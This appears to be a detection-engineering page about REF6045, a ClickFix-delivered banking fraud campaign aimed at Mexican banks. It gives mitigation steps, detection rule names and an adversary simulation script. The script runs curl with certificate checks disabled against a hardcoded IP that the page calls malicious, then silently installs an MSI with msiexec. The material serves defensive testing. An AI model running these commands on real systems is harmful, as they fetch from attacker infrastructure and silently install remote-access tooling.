ClickFix to Cash-Out: Breaking Down a Mexican Banking Fraud Toolkit
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
REF6045 is an operator-assisted banking fraud campaign focused on the Mexican financial sector. It uses a ClickFix-style delivery method with fake CAPTCHA pages to convince victims to run malicious PowerShell commands. After infection, the SCMBANKER toolkit allows human operators to observe banking sessions, capture screenshots, alter clipboard contents, and deploy Remote Utilities RAT for full remote control.
Investigation
Elastic Security Labs uncovered the threat after detecting suspicious bitsadmin activity downloading PowerShell scripts from an open directory. The investigation exposed the full toolkit through a publicly accessible web-root archive, zkt.zip, and revealed major operational security weaknesses, including unauthenticated file editors and open directories on the command-and-control infrastructure. Analysis also showed that the toolkit contains extensive AI-generated artifacts in its codebase.
Mitigation
Organizations should limit use of PowerShell and bitsadmin to approved users and enforce strict execution controls. Users should be trained to identify social engineering lures such as fake CAPTCHA prompts or fake Windows Update screens. Security teams should also deploy strong monitoring for suspicious registry changes and unauthorized installation of remote access software.
Response
If this activity is detected, isolate affected systems immediately to stop command-and-control communication and possible data theft. Conduct a forensic investigation to determine the scope of compromise and check for Remote Utilities or unauthorized registry modifications. Reset passwords for all financial and other sensitive accounts accessed from the affected machines.
Attack Flow
Detections
MsiExec Spawned by Shell Process (via cmdline)
View
Attrib Execution to Hide Files (via cmdline)
View
Suspicious Files in Public User Profile (via file_event)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Shutdown Used For Forcing a System Halt or Reboot (via cmdline)
View
LOLBAS Bitsadmin (via cmdline)
View
Possible Delayed Execution Behavior (via cmdline)
View
Possible Account or Group Enumeration / Manipulation (via cmdline)
View
Microsoft Edge Spawning Spawning Unusual Process (via cmdline)
View
Suspicious CURL Usage (via cmdline)
View
Suspicious Executable/Script Execution Location via [cmd.exe /C] (via cmdline)
View
Detection of SCMBANKER and Remote Utilities Installation [Windows Process Creation]
View
SCMBANKER Toolkit Activity Detection [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary aims to establish a foothold on the target system by mimicking the REF6045 banking fraud pattern. First, they attempt to download a validation file from a hardcoded malicious IP address (
68.211.161.46) usingcurlwith the-k(insecure) flag to bypass SSL certificate validation. Following the download, the adversary executes a silent installation of a malicious remote access tool usingmsiexec.exewith the/i(install) and/quiet(silent) switches, targeting a file namedhosts.msi. This provides them with persistent remote access while minimizing user interaction. -
Regression Test Script:
# Simulation Script for REF6045 TTPs # This script mimics the specific command lines defined in the detection rule. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Step 1: Simulating Ingress Tool Transfer via curl..." -ForegroundColor Cyan # Note: Using a fake file via curl to avoid actual malicious traffic, # but maintaining the exact command line string required for detection. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Step 2: Simulating Silent MSI Installation..." -ForegroundColor Cyan # Create a dummy MSI file so msiexec doesn't immediately error out (though the rule triggers on the command line) # For the sake of purely testing the DETECTION LOGIC (the command line), # we will execute the exact command string. msiexec /i "hosts.msi" /quiet /norestart -
Cleanup Commands:
# Cleanup script to remove artifacts $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Cleanup complete: $WorkDir removed." -ForegroundColor Green } else { Write-Host "[!] Cleanup skipped: Directory not found." -ForegroundColor Yellow }